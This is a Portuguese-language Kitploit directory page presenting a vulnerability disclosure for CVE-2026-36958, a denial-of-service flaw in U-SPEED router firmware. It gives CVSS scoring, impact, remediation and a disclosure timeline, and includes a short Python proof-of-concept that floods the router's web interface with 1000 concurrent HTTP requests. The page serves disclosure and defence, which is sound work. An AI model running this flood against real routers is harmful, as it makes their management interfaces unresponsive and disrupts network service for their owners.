Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-36958 — Prova de conceito para CVE-2026-36958, uma vulnerabilidade de negação de serviço no firmware do roteador U-SPEED que esgota recursos por meio de solicitações HTTP concorrentes, fazendo com que a interface web fique sem resposta. | Kitploit
Ferramentas/GitHubGitHub/kirubel-cve/cve-2026-36958
Análise de VulnerabilidadesExploraçãoSegurança WebSegurança de RedeTestes de Penetração
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Prova de conceito para CVE-2026-36958, uma vulnerabilidade de negação de serviço no firmware do roteador U-SPEED que esgota recursos por meio de solicitações HTTP concorrentes, fazendo com que a interface web fique sem resposta.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-36958: Negação de Serviço via Requisições HTTP Concorrentes

ID CVE: CVE-2026-36958 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: U-SPEED Produto: Roteador U-SPEED Versão do Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos Não Controlado


Descrição

O firmware V1.0.0 do Roteador U-SPEED é vulnerável a Negação de Serviço. Ao enviar um grande número de requisições HTTP concorrentes para endpoints aleatórios ou inexistentes na interface de gerenciamento web, um atacante pode esgotar os recursos do sistema no servidor HTTP Boa embarcado. Isso faz com que a interface web do roteador fique sem resposta e pode exigir uma reinicialização manual para restaurar a operação normal.


Pontuação CVSS

Pontuação CVSS v3.1: 7.5 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MétricaValor
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
Impacto na ConfidencialidadeNenhum
Impacto na IntegridadeNenhum
Impacto na DisponibilidadeAlto

Prova de Conceito

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Comportamento Esperado: O servidor deve lidar com conexões concorrentes de forma graciosa. Comportamento Real: A interface web fica sem resposta; reinicialização manual necessária.


Impacto

  • A interface de gerenciamento web fica indisponível
  • Possível interrupção dos serviços de roteamento
  • Requer reinicialização manual para restaurar a funcionalidade

Remediação

  • Implementar limitação de taxa de conexões no servidor web Boa
  • Limitar o máximo de conexões concorrentes por IP de origem
  • Adicionar mecanismo automático de recuperação/watchdog

Linha do Tempo da Divulgação

DataEvento
2026-04-29Vulnerabilidade descoberta
2026-04-29Reportada à MITRE
2026-04-29CVE-2026-36958 atribuído
2026-04-29Divulgação pública

Referências

  • MITRE CVE-2026-36958
  • CWE-400
  • Site do Fornecedor
Baixar ferramenta